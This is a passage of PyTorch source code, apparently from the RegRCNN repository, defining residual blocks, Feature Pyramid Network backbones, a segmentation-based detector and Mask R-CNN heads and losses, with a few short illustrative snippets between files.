raise ValueError('norm type as specified in configs is not implemented... {}'.format(norm))
module = nn.Sequential(module, norm_layer)
else:
raise Exception("Invalid dimension {} in conv-layer generation.".format(self.dim))
if relu is not None:
if relu == 'relu':
relu_layer = nn.ReLU(inplace=True)
elif relu == 'leaky_relu':
relu_layer = nn.LeakyReLU(inplace=True)
else:
raise ValueError('relu type as specified in configs is not implemented...')
module = nn.Sequential(module, relu_layer)
return module
class Interpolate(nn.Module):
def __init__(self, scale_factor, mode):
super(Interpolate, self).__init__()
self.interp = nn.functional.interpolate
self.scale_factor = scale_factor
self.mode = mode
def forward(self, x):
x = self.interp(x, scale_factor=self.scale_factor, mode=self.mode, align_corners=False)
return x
class ResBlock(nn.Module):
def __init__(self, start_filts, planes, end_filts, conv, stride=1, identity_skip=True, norm=None, relu='relu'):
"""Builds a residual net block.
:param start_filts: #input channels to the block.
:param planes: #channels in block's hidden layers. set start_filts>planes<end_filts for bottlenecking.
:param end_filts: #output channels of the block.
:param conv: conv-layer generator.
:param stride:
:param identity_skip: whether to use weight-less identity on skip-connection if no rescaling necessary.
:param norm:
:param relu:
"""
super(ResBlock, self).__init__()
self.conv1 = conv(start_filts, planes, ks=1, stride=stride, norm=norm, relu=relu)
self.conv2 = conv(planes, planes, ks=3, pad=1, norm=norm, relu=relu)
self.conv3 = conv(planes, end_filts, ks=1, norm=norm, relu=None)
if relu == 'relu':
self.relu = nn.ReLU(inplace=True)
elif relu == 'leaky_relu':
self.relu = nn.LeakyReLU(inplace=True)
else:
raise Exception("Chosen activation {} not implemented.".format(self.relu))
if stride!=1 or start_filts!=end_filts or not identity_skip:
self.scale_residual = conv(start_filts, end_filts, ks=1, stride=stride, norm=norm, relu=None)
else:
self.scale_residual = None
def forward(self, x):
out = self.conv1(x)
out = self.conv2(out)
out = self.conv3(out)
if self.scale_residual:
residual = self.scale_residual(x)
else:
residual = x
out += residual
out = self.relu(out)
return out
class FPN(nn.Module):
"""
Feature Pyramid Network from https://arxiv.org/pdf/1612.03144.pdf with options for modifications.
by default is constructed with Pyramid levels P2, P3, P4, P5.
"""
def __init__(self, cf, conv, relu_enc="relu", relu_dec=None, operate_stride1=False):
"""
:param conv: instance of custom conv class containing the dimension info.
:param relu_enc: string specifying type of nonlinearity in encoder. If None, no nonlinearity is applied.
:param relu_dec: same as relu_enc but for decoder.
:param operate_stride1: boolean flag. enables adding of Pyramid levels P1 (output stride 2) and P0 (output stride 1).
from configs:
:param channels: len(channels) is nr of channel dimensions in input data.
:param start_filts: number of feature_maps in first layer. rest is scaled accordingly.
:param end_filts: number of feature_maps for output_layers of all levels in decoder.
:param res_architecture: string deciding whether to use "resnet50" or "resnet101".
:param norm: string specifying type of feature map normalization. If None, no normalization is applied.
:param sixth_pooling: boolean flag. enables adding of Pyramid level P6.
"""
super(FPN, self).__init__()
self.start_filts, sf = cf.start_filts, cf.start_filts #sf = alias for readability
self.out_channels = cf.end_filts
self.n_blocks = [3, 4, {"resnet50": 6, "resnet101": 23}[cf.res_architecture], 3]
self.block = ResBlock
self.block_exp = 4 #factor by which to increase nr of channels in first block layer.
self.relu_enc = relu_enc
self.relu_dec = relu_dec
self.operate_stride1 = operate_stride1
self.sixth_pooling = cf.sixth_pooling
if operate_stride1:
self.C0 = nn.Sequential(conv(len(cf.channels), sf, ks=3, pad=1, norm=cf.norm, relu=relu_enc),
conv(sf, sf, ks=3, pad=1, norm=cf.norm, relu=relu_enc))
self.C1 = conv(sf, sf, ks=7, stride=(2, 2, 1) if conv.dim == 3 else 2, pad=3, norm=cf.norm,
relu=relu_enc)
else:
self.C1 = conv(len(cf.channels), sf, ks=7, stride=(2, 2, 1) if conv.dim == 3 else 2, pad=3, norm=cf.norm,
relu=relu_enc)
C2_layers = []
C2_layers.append(nn.MaxPool2d(kernel_size=3, stride=2, padding=1) if
conv.dim == 2 else nn.MaxPool3d(kernel_size=3, stride=(2, 2, 1), padding=1))
C2_layers.append(self.block(sf, sf, sf*self.block_exp, conv=conv, stride=1, norm=cf.norm,
relu=relu_enc))
for i in range(1, self.n_blocks[0]):
C2_layers.append(self.block(sf*self.block_exp, sf, sf*self.block_exp, conv=conv,
stride=1, norm=cf.norm, relu=relu_enc))
self.C2 = nn.Sequential(*C2_layers)
C3_layers = []
C3_layers.append(self.block(sf*self.block_exp, sf*2, sf*self.block_exp*2, conv=conv,
stride=2, norm=cf.norm, relu=relu_enc))
for i in range(1, self.n_blocks[1]):
C3_layers.append(self.block(sf*self.block_exp*2, sf*2, sf*self.block_exp*2,
conv=conv, norm=cf.norm, relu=relu_enc))
self.C3 = nn.Sequential(*C3_layers)
C4_layers = []
C4_layers.append(self.block(sf*self.block_exp*2, sf*4, sf*self.block_exp*4,
conv=conv, stride=2, norm=cf.norm, relu=relu_enc))
for i in range(1, self.n_blocks[2]):
C4_layers.append(self.block(sf*self.block_exp*4, sf*4, sf*self.block_exp*4,
conv=conv, norm=cf.norm, relu=relu_enc))
self.C4 = nn.Sequential(*C4_layers)
C5_layers = []
C5_layers.append(self.block(sf*self.block_exp*4, sf*8, sf*self.block_exp*8,
conv=conv, stride=2, norm=cf.norm, relu=relu_enc))
for i in range(1, self.n_blocks[3]):
C5_layers.append(self.block(sf*self.block_exp*8, sf*8, sf*self.block_exp*8,
conv=conv, norm=cf.norm, relu=relu_enc))
self.C5 = nn.Sequential(*C5_layers)
if self.sixth_pooling:
C6_layers = []
C6_layers.append(self.block(sf*self.block_exp*8, sf*16, sf*self.block_exp*16,
conv=conv, stride=2, norm=cf.norm, relu=relu_enc))
for i in range(1, self.n_blocks[3]):
C6_layers.append(self.block(sf*self.block_exp*16, sf*16, sf*self.block_exp*16,
conv=conv, norm=cf.norm, relu=relu_enc))
self.C6 = nn.Sequential(*C6_layers)
if conv.dim == 2:
self.P1_upsample = Interpolate(scale_factor=2, mode='bilinear')
self.P2_upsample = Interpolate(scale_factor=2, mode='bilinear')
else:
self.P1_upsample = Interpolate(scale_factor=(2, 2, 1), mode='trilinear')
self.P2_upsample = Interpolate(scale_factor=(2, 2, 1), mode='trilinear')
if self.sixth_pooling:
self.P6_conv1 = conv(sf*self.block_exp*16, self.out_channels, ks=1, stride=1, relu=relu_dec)
self.P5_conv1 = conv(sf*self.block_exp*8, self.out_channels, ks=1, stride=1, relu=relu_dec)
self.P4_conv1 = conv(sf*self.block_exp*4, self.out_channels, ks=1, stride=1, relu=relu_dec)
self.P3_conv1 = conv(sf*self.block_exp*2, self.out_channels, ks=1, stride=1, relu=relu_dec)
self.P2_conv1 = conv(sf*self.block_exp, self.out_channels, ks=1, stride=1, relu=relu_dec)
self.P1_conv1 = conv(sf, self.out_channels, ks=1, stride=1, relu=relu_dec)
if operate_stride1:
self.P0_conv1 = conv(sf, self.out_channels, ks=1, stride=1, relu=relu_dec)
self.P0_conv2 = conv(self.out_channels, self.out_channels, ks=3, stride=1, pad=1, relu=relu_dec)
self.P1_conv2 = conv(self.out_channels, self.out_channels, ks=3, stride=1, pad=1, relu=relu_dec)
self.P2_conv2 = conv(self.out_channels, self.out_channels, ks=3, stride=1, pad=1, relu=relu_dec)
self.P3_conv2 = conv(self.out_channels, self.out_channels, ks=3, stride=1, pad=1, relu=relu_dec)
self.P4_conv2 = conv(self.out_channels, self.out_channels, ks=3, stride=1, pad=1, relu=relu_dec)
self.P5_conv2 = conv(self.out_channels, self.out_channels, ks=3, stride=1, pad=1, relu=relu_dec)
if self.sixth_pooling:
self.P6_conv2 = conv(self.out_channels, self.out_channels, ks=3, stride=1, pad=1, relu=relu_dec)
def forward(self, x):
"""
:param x: input image of shape (b, c, y, x, (z))
:return: list of output feature maps per pyramid level, each with shape (b, c, y, x, (z)).
"""
if self.operate_stride1:
c0_out = self.C0(x)
else:
c0_out = x
c1_out = self.C1(c0_out)
c2_out = self.C2(c1_out)
c3_out = self.C3(c2_out)
c4_out = self.C4(c3_out)
c5_out = self.C5(c4_out)
if self.sixth_pooling:
c6_out = self.C6(c5_out)
p6_pre_out = self.P6_conv1(c6_out)
p5_pre_out = self.P5_conv1(c5_out) + F.interpolate(p6_pre_out, scale_factor=2)
else:
p5_pre_out = self.P5_conv1(c5_out)
#pre_out means last step before prediction output
p4_pre_out = self.P4_conv1(c4_out) + F.interpolate(p5_pre_out, scale_factor=2)
p3_pre_out = self.P3_conv1(c3_out) + F.interpolate(p4_pre_out, scale_factor=2)
p2_pre_out = self.P2_conv1(c2_out) + F.interpolate(p3_pre_out, scale_factor=2)
# plot feature map shapes for debugging.
# for ii in [c0_out, c1_out, c2_out, c3_out, c4_out, c5_out, c6_out]:
# print ("encoder shapes:", ii.shape)
#
# for ii in [p6_out, p5_out, p4_out, p3_out, p2_out, p1_out]:
# print("decoder shapes:", ii.shape)
p2_out = self.P2_conv2(p2_pre_out)
p3_out = self.P3_conv2(p3_pre_out)
p4_out = self.P4_conv2(p4_pre_out)
p5_out = self.P5_conv2(p5_pre_out)
out_list = [p2_out, p3_out, p4_out, p5_out]
if self.sixth_pooling:
p6_out = self.P6_conv2(p6_pre_out)
out_list.append(p6_out)
if self.operate_stride1:
p1_pre_out = self.P1_conv1(c1_out) + self.P2_upsample(p2_pre_out)
p0_pre_out = self.P0_conv1(c0_out) + self.P1_upsample(p1_pre_out)
# p1_out = self.P1_conv2(p1_pre_out) # usually not needed.
p0_out = self.P0_conv2(p0_pre_out)
out_list = [p0_out] + out_list
return out_list
def conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=dilation, groups=groups, bias=False, dilation=dilation)
def conv1x1(in_planes, out_planes, stride=1):
"""1x1 convolution"""
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,
base_width=64, dilation=1, norm_layer=None):
super(BasicBlock, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
if groups != 1 or base_width != 64:
raise ValueError('BasicBlock only supports groups=1 and base_width=64')
if dilation > 1:
raise NotImplementedError("Dilation > 1 not supported in BasicBlock")
# Both self.conv1 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = norm_layer(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = norm_layer(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,
base_width=64, dilation=1, norm_layer=None):
super(Bottleneck, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
width = int(planes * (base_width / 64.)) * groups
# Both self.conv2 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv1x1(inplanes, width)
self.bn1 = norm_layer(width)
self.conv2 = conv3x3(width, width, stride, groups, dilation)
self.bn2 = norm_layer(width)
self.conv3 = conv1x1(width, planes * self.expansion)
self.bn3 = norm_layer(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class FPN_pytorch_official(nn.Module):
def __init__(self, cf, conv, operate_stride1=False):
super(FPN_pytorch_official, self).__init__()
block = Bottleneck
self.cf = cf
if cf.res_architecture == 'resnet18':
layers = [2, 2, 2, 2]
block = BasicBlock
if cf.res_architecture == 'resnet50':
layers = [3, 4, 6, 3]
if cf.res_architecture == 'resnet101':
layers = [3, 4, 23, 3]
num_classes = 1000
zero_init_residual = False
groups = 1
width_per_group = 64
replace_stride_with_dilation = None
self._norm_layer = nn.BatchNorm2d
self.inplanes = 64
self.dilation = 1
replace_stride_with_dilation = [False, False, False]
if len(replace_stride_with_dilation) != 3:
raise ValueError("replace_stride_with_dilation should be None "
"or a 3-element tuple, got {}".format(replace_stride_with_dilation))
self.groups = groups
self.base_width = width_per_group
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = self._norm_layer(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2,
dilate=replace_stride_with_dilation[0])
self.layer3 = self._make_layer(block, 256, layers[2], stride=2,
dilate=replace_stride_with_dilation[1])
self.layer4 = self._make_layer(block, 512, layers[3], stride=2,
dilate=replace_stride_with_dilation[2])
self.out_channels = cf.end_filts
self.P5_conv1 = conv(2048, self.out_channels, ks=1, stride=1, relu=None)
self.P4_conv1 = conv(1024, self.out_channels, ks=1, stride=1, relu=None)
self.P3_conv1 = conv(512, self.out_channels, ks=1, stride=1, relu=None)
self.P2_conv1 = conv(256, self.out_channels, ks=1, stride=1, relu=None)
self.P2_conv2 = conv(self.out_channels, self.out_channels, ks=3, stride=1, pad=1, relu=None)
self.P3_conv2 = conv(self.out_channels, self.out_channels, ks=3, stride=1, pad=1, relu=None)
self.P4_conv2 = conv(self.out_channels, self.out_channels, ks=3, stride=1, pad=1, relu=None)
self.P5_conv2 = conv(self.out_channels, self.out_channels, ks=3, stride=1, pad=1, relu=None)
def _make_layer(self, block, planes, blocks, stride=1, dilate=False):
norm_layer = self._norm_layer
downsample = None
previous_dilation = self.dilation
if dilate:
self.dilation *= stride
stride = 1
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
norm_layer(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, self.groups,
self.base_width, previous_dilation, norm_layer))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes, groups=self.groups,
base_width=self.base_width, dilation=self.dilation,
norm_layer=norm_layer))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
c2_out = self.layer1(x)
c3_out = self.layer2(c2_out)
c4_out = self.layer3(c3_out)
c5_out = self.layer4(c4_out)
p5_pre_out = self.P5_conv1(c5_out)
p4_pre_out = self.P4_conv1(c4_out) + F.interpolate(p5_pre_out, scale_factor=2)
p3_pre_out = self.P3_conv1(c3_out) + F.interpolate(p4_pre_out, scale_factor=2)
p2_pre_out = self.P2_conv1(c2_out) + F.interpolate(p3_pre_out, scale_factor=2)
p2_out = self.P2_conv2(p2_pre_out)
p3_out = self.P3_conv2(p3_pre_out)
p4_out = self.P4_conv2(p4_pre_out)
p5_out = self.P5_conv2(p5_pre_out)
out_list = [p2_out, p3_out, p4_out, p5_out]
return out_list
```
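A quick, hedged shape check for the `ConvGenerator` abstraction above; the `models.backbone` import path assumes the RegRCNN repository root is on `PYTHONPATH`.
```python
import torch
from models.backbone import ConvGenerator

conv2d = ConvGenerator(dim=2)
block = conv2d(c_in=1, c_out=48, ks=7, pad=3, stride=2, norm='batch_norm', relu='relu')
x = torch.randn(2, 1, 64, 64)            # (batch, channels, y, x)
print(block(x).shape)                    # torch.Size([2, 48, 32, 32]) -- stride 2 halves y and x
```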
#### File: RegRCNN/models/detection_fpn.py
```python
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from scipy.ndimage.measurements import label as lb
import utils.exp_utils as utils
import utils.model_utils as mutils
class net(nn.Module):
def __init__(self, cf, logger):
super(net, self).__init__()
self.cf = cf
self.logger = logger
backbone = utils.import_module('bbone', cf.backbone_path)
self.logger.info("loaded backbone from {}".format(self.cf.backbone_path))
conv_gen = backbone.ConvGenerator(cf.dim)
# set operate_stride1=True to generate a unet-like FPN.
self.fpn = backbone.FPN(cf, conv=conv_gen, relu_enc=cf.relu, operate_stride1=True)
self.conv_final = conv_gen(cf.end_filts, cf.num_seg_classes, ks=1, pad=0, norm=None, relu=None)
#initialize parameters
if self.cf.weight_init=="custom":
logger.info("Tried to use custom weight init which is not defined. Using pytorch default.")
elif self.cf.weight_init:
mutils.initialize_weights(self)
else:
logger.info("using default pytorch weight init")
def forward(self, x):
"""
forward pass of network.
:param x: input image. shape (b, c, y, x, (z))
:return: seg_logits: shape (b, n_classes, y, x, (z))
:return: out_box_coords: list over n_classes. elements are arrays(b, n_rois, (y1, x1, y2, x2, (z1), (z2)))
:return: out_max_scores: list over n_classes. elements are arrays(b, n_rois)
"""
out_features = self.fpn(x)[0] #take only pyramid output of stride 1
seg_logits = self.conv_final(out_features)
out_box_coords, out_max_scores = [], []
smax = F.softmax(seg_logits.detach(), dim=1).cpu().data.numpy()
for cl in range(1, len(self.cf.class_dict.keys()) + 1):
hard_mask = np.copy(smax).argmax(1)
hard_mask[hard_mask != cl] = 0
hard_mask[hard_mask == cl] = 1
# perform connected component analysis on argmaxed predictions,
# draw boxes around components and return coordinates.
box_coords, rois = mutils.get_coords(hard_mask, self.cf.n_roi_candidates, self.cf.dim)
# for each object, choose the highest softmax score (in the respective class)
# of all pixels in the component as object score.
max_scores = [[] for _ in range(x.shape[0])]
for bix, broi in enumerate(rois):
for nix, nroi in enumerate(broi):
score_det = np.max if self.cf.score_det=="max" else np.median #score determination
max_scores[bix].append(score_det(smax[bix, cl][nroi > 0]))
out_box_coords.append(box_coords)
out_max_scores.append(max_scores)
return seg_logits, out_box_coords, out_max_scores
def train_forward(self, batch, **kwargs):
"""
train method (also used for validation monitoring). wrapper around forward pass of network. prepares input data
for processing, computes losses, and stores outputs in a dictionary.
:param batch: dictionary containing 'data', 'seg', etc.
:param kwargs:
:return: results_dict: dictionary with keys:
'boxes': list over batch elements. each batch element is a list of boxes. each box is a dictionary:
[[{box_0}, ... {box_n}], [{box_0}, ... {box_n}], ...]
'seg_preds': pixel-wise class predictions (b, 1, y, x, (z)) with values [0, n_classes]
'torch_loss': 1D torch tensor for backprop.
'class_loss': classification loss for monitoring. here: a dummy value (np.nan), since no classification is conducted.
"""
img = torch.from_numpy(batch['data']).cuda().float()
seg = torch.from_numpy(batch['seg']).cuda().long()
seg_ohe = torch.from_numpy(mutils.get_one_hot_encoding(batch['seg'], self.cf.num_seg_classes)).cuda()
results_dict = {}
seg_logits, box_coords, max_scores = self.forward(img)
# no extra class loss applied in this model. pass dummy tensor for monitoring.
results_dict['class_loss'] = np.nan
results_dict['boxes'] = [[] for _ in range(img.shape[0])]
for cix in range(len(self.cf.class_dict.keys())):
for bix in range(img.shape[0]):
for rix in range(len(max_scores[cix][bix])):
if max_scores[cix][bix][rix] > self.cf.detection_min_confidence:
results_dict['boxes'][bix].append({'box_coords': np.copy(box_coords[cix][bix][rix]),
'box_score': max_scores[cix][bix][rix],
'box_pred_class_id': cix + 1, # offset by 1: class id 0 is background.
'box_type': 'det'})
for bix in range(img.shape[0]):
for tix in range(len(batch['bb_target'][bix])):
gt_box = {'box_coords': batch['bb_target'][bix][tix], 'box_type': 'gt'}
for name in self.cf.roi_items:
gt_box.update({name: batch[name][bix][tix]})
results_dict['boxes'][bix].append(gt_box)
# compute segmentation loss as either weighted cross entropy, dice loss, or the sum of both.
loss = torch.tensor([0.], dtype=torch.float, requires_grad=False).cuda()
seg_pred = F.softmax(seg_logits, dim=1)
if self.cf.seg_loss_mode == 'dice' or self.cf.seg_loss_mode == 'dice_wce':
loss += 1 - mutils.batch_dice(seg_pred, seg_ohe.float(), false_positive_weight=float(self.cf.fp_dice_weight))
if self.cf.seg_loss_mode == 'wce' or self.cf.seg_loss_mode == 'dice_wce':
loss += F.cross_entropy(seg_logits, seg[:, 0], weight=torch.FloatTensor(self.cf.wce_weights).cuda())
results_dict['torch_loss'] = loss
seg_pred = seg_pred.argmax(dim=1).unsqueeze(dim=1).cpu().data.numpy()
results_dict['seg_preds'] = seg_pred
if 'dice' in self.cf.metrics:
results_dict['batch_dices'] = mutils.dice_per_batch_and_class(seg_pred, batch["seg"],
self.cf.num_seg_classes, convert_to_ohe=True)
#self.logger.info("loss: {0:.2f}".format(loss.item()))
return results_dict
def test_forward(self, batch, **kwargs):
"""
test method. wrapper around forward pass of network without usage of any ground truth information.
prepares input data for processing and stores outputs in a dictionary.
:param batch: dictionary containing 'data'
:param kwargs:
:return: results_dict: dictionary with keys:
'boxes': list over batch elements. each batch element is a list of boxes. each box is a dictionary:
[[{box_0}, ... {box_n}], [{box_0}, ... {box_n}], ...]
'seg_preds': pixel-wise class predictions (b, 1, y, x, (z)) with values [0, n_classes]
"""
img = torch.FloatTensor(batch['data']).cuda()
seg_logits, box_coords, max_scores = self.forward(img)
results_dict = {}
results_dict['boxes'] = [[] for _ in range(img.shape[0])]
for cix in range(len(box_coords)):
for bix in range(img.shape[0]):
for rix in range(len(max_scores[cix][bix])):
if max_scores[cix][bix][rix] > self.cf.detection_min_confidence:
results_dict['boxes'][bix].append({'box_coords': np.copy(box_coords[cix][bix][rix]),
'box_score': max_scores[cix][bix][rix],
'box_pred_class_id': cix + 1,
'box_type': 'det'})
results_dict['seg_preds'] = F.softmax(seg_logits, dim=1).cpu().data.numpy()
return results_dict
```
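An illustrative sketch of the "connected components to boxes" step in `net.forward()` above. `mutils.get_coords` is the repository's own helper; the stand-in below only demonstrates the underlying idea with `scipy.ndimage`.
```python
import numpy as np
from scipy.ndimage import label, find_objects

hard_mask = np.zeros((32, 32), dtype=np.uint8)
hard_mask[5:10, 5:12] = 1                         # one fake foreground component
components, n_rois = label(hard_mask)             # connected component analysis
boxes = [(sl[0].start, sl[1].start, sl[0].stop, sl[1].stop) for sl in find_objects(components)]
print(n_rois, boxes)                              # 1 [(5, 5, 10, 12)]
```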
#### File: RegRCNN/models/mrcnn.py
```python
import os
from multiprocessing import Pool
import time
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils
import utils.model_utils as mutils
import utils.exp_utils as utils
class RPN(nn.Module):
"""
Region Proposal Network.
"""
def __init__(self, cf, conv):
super(RPN, self).__init__()
self.dim = conv.dim
self.conv_shared = conv(cf.end_filts, cf.n_rpn_features, ks=3, stride=cf.rpn_anchor_stride, pad=1, relu=cf.relu)
self.conv_class = conv(cf.n_rpn_features, 2 * len(cf.rpn_anchor_ratios), ks=1, stride=1, relu=None)
self.conv_bbox = conv(cf.n_rpn_features, 2 * self.dim * len(cf.rpn_anchor_ratios), ks=1, stride=1, relu=None)
def forward(self, x):
"""
:param x: input feature maps (b, in_channels, y, x, (z))
:return: rpn_class_logits (b, n_anchors, 2)
:return: rpn_probs (b, n_anchors, 2)
:return: rpn_bbox (b, n_anchors, 2 * dim)
"""
# Shared convolutional base of the RPN.
x = self.conv_shared(x)
# Anchor Score. (batch, anchors per location * 2, y, x, (z)).
rpn_class_logits = self.conv_class(x)
# Reshape to (batch, 2, anchors)
axes = (0, 2, 3, 1) if self.dim == 2 else (0, 2, 3, 4, 1)
rpn_class_logits = rpn_class_logits.permute(*axes)
rpn_class_logits = rpn_class_logits.contiguous()
rpn_class_logits = rpn_class_logits.view(x.size()[0], -1, 2)
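# Shape trace (illustrative assumption: 2D, 3 anchor ratios, HxW feature map):
# (b, 6, H, W) -> permute -> (b, H, W, 6) -> view -> (b, H*W*3, 2)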
# Softmax on last dimension (fg vs. bg).
rpn_probs = F.softmax(rpn_class_logits, dim=2)
# Bounding box refinement: (batch, anchors_per_location * 2 * dim, y, x, (z)); per anchor the deltas are (dy, dx, (dz), log(dh), log(dw), (log(dd))).
rpn_bbox = self.conv_bbox(x)
# Reshape to (batch, 2*dim, anchors)
rpn_bbox = rpn_bbox.permute(*axes)
rpn_bbox = rpn_bbox.contiguous()
rpn_bbox = rpn_bbox.view(x.size()[0], -1, self.dim * 2)
return [rpn_class_logits, rpn_probs, rpn_bbox]
class Classifier(nn.Module):
"""
Head network for classification and bounding box refinement. Performs RoiAlign, processes resulting features through a
shared convolutional base and finally branches off the classifier- and regression head.
"""
def __init__(self, cf, conv):
super(Classifier, self).__init__()
self.cf = cf
self.dim = conv.dim
self.in_channels = cf.end_filts
self.pool_size = cf.pool_size
self.pyramid_levels = cf.pyramid_levels
# instance_norm does not work with spatial dims (1, 1, (1))
norm = cf.norm if cf.norm != 'instance_norm' else None
self.conv1 = conv(cf.end_filts, cf.end_filts * 4, ks=self.pool_size, stride=1, norm=norm, relu=cf.relu)
self.conv2 = conv(cf.end_filts * 4, cf.end_filts * 4, ks=1, stride=1, norm=norm, relu=cf.relu)
self.linear_bbox = nn.Linear(cf.end_filts * 4, cf.head_classes * 2 * self.dim)
if 'regression' in self.cf.prediction_tasks:
self.linear_regressor = nn.Linear(cf.end_filts * 4, cf.head_classes * cf.regression_n_features)
self.rg_n_feats = cf.regression_n_features
#classify into bins of regression values
elif 'regression_bin' in self.cf.prediction_tasks:
self.linear_regressor = nn.Linear(cf.end_filts * 4, cf.head_classes * len(cf.bin_labels))
self.rg_n_feats = len(cf.bin_labels)
else:
self.linear_regressor = lambda x: torch.zeros((x.shape[0], cf.head_classes * 1), dtype=torch.float32).fill_(float('NaN')).cuda()
self.rg_n_feats = 1 #cf.regression_n_features
if 'class' in self.cf.prediction_tasks:
self.linear_class = nn.Linear(cf.end_filts * 4, cf.head_classes)
else:
assert cf.head_classes == 2, "#head classes {} needs to be 2 (bg/fg) when not predicting classes".format(cf.head_classes)
self.linear_class = lambda x: torch.zeros((x.shape[0], cf.head_classes), dtype=torch.float64).cuda()
def forward(self, x, rois):
"""
:param x: input feature maps (b, in_channels, y, x, (z))
:param rois: normalized box coordinates as proposed by the RPN to be forwarded through
the second stage (n_proposals, (y1, x1, y2, x2, (z1), (z2), batch_ix). Proposals of all batch elements
have been merged to one vector, while the origin info has been stored for re-allocation.
:return: mrcnn_class_logits (n_proposals, n_head_classes)
:return: mrcnn_bbox (n_proposals, n_head_classes, 2 * dim) predicted corrections to be applied to proposals for refinement.
"""
x = mutils.pyramid_roi_align(x, rois, self.pool_size, self.pyramid_levels, self.dim)
x = self.conv1(x)
x = self.conv2(x)
x = x.view(-1, self.in_channels * 4)
mrcnn_bbox = self.linear_bbox(x)
mrcnn_bbox = mrcnn_bbox.view(mrcnn_bbox.size()[0], -1, self.dim * 2)
mrcnn_class_logits = self.linear_class(x)
mrcnn_regress = self.linear_regressor(x)
mrcnn_regress = mrcnn_regress.view(mrcnn_regress.size()[0], -1, self.rg_n_feats)
return [mrcnn_bbox, mrcnn_class_logits, mrcnn_regress]
class Mask(nn.Module):
"""
Head network for proposal-based mask segmentation. Performs RoiAlign, some convolutions and applies sigmoid on the
output logits to allow for overlapping classes.
"""
def __init__(self, cf, conv):
super(Mask, self).__init__()
self.pool_size = cf.mask_pool_size
self.pyramid_levels = cf.pyramid_levels
self.dim = conv.dim
self.conv1 = conv(cf.end_filts, cf.end_filts, ks=3, stride=1, pad=1, norm=cf.norm, relu=cf.relu)
self.conv2 = conv(cf.end_filts, cf.end_filts, ks=3, stride=1, pad=1, norm=cf.norm, relu=cf.relu)
self.conv3 = conv(cf.end_filts, cf.end_filts, ks=3, stride=1, pad=1, norm=cf.norm, relu=cf.relu)
self.conv4 = conv(cf.end_filts, cf.end_filts, ks=3, stride=1, pad=1, norm=cf.norm, relu=cf.relu)
if conv.dim == 2:
self.deconv = nn.ConvTranspose2d(cf.end_filts, cf.end_filts, kernel_size=2, stride=2)
else:
self.deconv = nn.ConvTranspose3d(cf.end_filts, cf.end_filts, kernel_size=2, stride=2)
self.relu = nn.ReLU(inplace=True) if cf.relu == 'relu' else nn.LeakyReLU(inplace=True)
self.conv5 = conv(cf.end_filts, cf.head_classes, ks=1, stride=1, relu=None)
self.sigmoid = nn.Sigmoid()
def forward(self, x, rois):
"""
:param x: input feature maps (b, in_channels, y, x, (z))
:param rois: normalized box coordinates as proposed by the RPN to be forwarded through
the second stage (n_proposals, (y1, x1, y2, x2, (z1), (z2), batch_ix). Proposals of all batch elements
have been merged to one vector, while the origin info has been stored for re-allocation.
:return: x: masks (n_sampled_proposals (n_detections in inference), n_classes, y, x, (z))
"""
x = mutils.pyramid_roi_align(x, rois, self.pool_size, self.pyramid_levels, self.dim)
x = self.conv1(x)
x = self.conv2(x)
x = self.conv3(x)
x = self.conv4(x)
x = self.relu(self.deconv(x))
x = self.conv5(x)
x = self.sigmoid(x)
return x
############################################################
# Loss Functions
############################################################
def compute_rpn_class_loss(rpn_class_logits, rpn_match, shem_poolsize):
"""
:param rpn_match: (n_anchors). [-1, 0, 1] for negative, neutral, and positive matched anchors.
:param rpn_class_logits: (n_anchors, 2). logits from RPN classifier.
:param shem_poolsize: int. factor of top-k candidates to draw from per negative sample (stochastic hard example mining).
:return: loss: torch tensor
:return: np_neg_ix: 1D array containing indices of the neg_roi_logits, which have been sampled for training.
"""
# Filter out neutral anchors
pos_indices = torch.nonzero(rpn_match == 1)
neg_indices = torch.nonzero(rpn_match == -1)
# loss for positive samples
if not 0 in pos_indices.size():
pos_indices = pos_indices.squeeze(1)
roi_logits_pos = rpn_class_logits[pos_indices]
pos_loss = F.cross_entropy(roi_logits_pos, torch.LongTensor([1] * pos_indices.shape[0]).cuda())
else:
pos_loss = torch.FloatTensor([0]).cuda()
# loss for negative samples: draw hard negative examples (SHEM)
# that match the number of positive samples, but at least 1.
if not 0 in neg_indices.size():
neg_indices = neg_indices.squeeze(1)
roi_logits_neg = rpn_class_logits[neg_indices]
